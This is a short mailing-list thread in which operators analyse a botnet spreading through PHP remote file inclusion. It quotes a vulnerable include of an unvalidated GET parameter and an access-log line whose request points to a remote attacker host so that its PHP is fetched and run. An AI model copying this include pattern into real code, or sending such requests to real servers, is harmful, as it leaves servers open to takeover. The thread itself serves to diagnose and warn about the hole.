Re:Destructive botnet originating from Japan

Well it appears that bad code always seems to be the root of problems, according to our research today the problem appears to be caused by incorrectly written PHP applications that perform includes using a string without running any validation against the string:

index.php?test=test
$test=$_GET[test];
include("$test.php");

When the include executes the test string passed from the GET includes execution instructions:

       "GET /index.php?test=http%3A//210.170.60.2/....? HTTP/1.0" 200 8010 "-" "Wget/1.6"

It appears that the attacker at 210.170.60.2 (also the botnet hosting IRC server) is spreading his code as the include is called, pulling and executing PHP code from a remote server that injects the software.

I'm not sure if this needs to be alerted to anyone outside of this list, but it's pretty nasty.

-Barrett

Well it appears that bad code always seems to be the root of problems, according to our research today the problem appears to be caused by incorrectly written PHP applications that perform includes using a string without running any validation against the string:

The truly frightening thing about an exploit using PHP is that the "bad code" can be as much user-generated as it is developer-generated. In other words, the clueless webmaster who copy/pastes code can unwittingly lead to the compromise of a server that s/he has even very limited user-level access on.

That and the vast variation of PHP versions we see still in use on various colo servers.

Another year, yet another variation of whack-a-mole.

--chuck goolsbee